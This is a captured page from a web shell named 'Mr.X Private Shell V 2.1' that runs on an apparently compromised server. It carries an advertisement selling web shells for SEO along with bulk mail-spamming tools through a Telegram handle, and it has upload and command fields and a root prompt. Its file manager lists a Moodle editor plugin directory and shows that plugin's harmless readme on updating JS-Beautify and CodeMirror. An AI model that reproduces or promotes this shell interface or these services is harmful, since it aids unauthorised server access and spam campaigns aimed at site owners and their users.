__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

root@216.73.217.120: ~ $
Description of updating JS-Beautify and CodeMirror libraries into Moodle.

There is a build script that should automate the process of updating the libraries.
It is located in the build directory and is called build.sh.
It requires the following pre-requisites: jq, npm and npx.
Most Moodle LMS development systems should have at least npm and npx installed.
However, jq is not a common tool and may need to be installed separately.

For example, on Ubuntu you would use:
sudo apt-get install jq

And on macOS with Homebrew:
brew install jq

Once you have the pre-requisites installed, you can run the build script.
from the root of the plugin (e.g lib/editor/tiny/plugins/html), run:
./build/build.sh

Once the script has run, you should see the following files updated:
* lib/editor/tiny/plugins/html/amd/src/beautify/beautify.js
* lib/editor/tiny/plugins/html/amd/src/beautify/beautify-css.js
* lib/editor/tiny/plugins/html/amd/src/beautify/beautify-html.js
* lib/editor/tiny/plugins/html/amd/src/codemirror/codemirror-lazy.js

Next, you need to run the build script for the Moodle plugin.
From the root of the plugin (e.g lib/editor/tiny/plugins/html), run:
cd amd
grunt

The build.sh script should display the latest versions of the libraries in order to
update thirdpartylibs.xml with the new version numbers.


Filemanager

Name Type Size Permission Actions
amd Folder 0755
build Folder 0755
classes Folder 0755
lang Folder 0755
tests Folder 0755
readme_moodle.txt File 1.29 KB 0644
thirdpartylibs.xml File 4.13 KB 0644
version.php File 1.07 KB 0644
Filemanager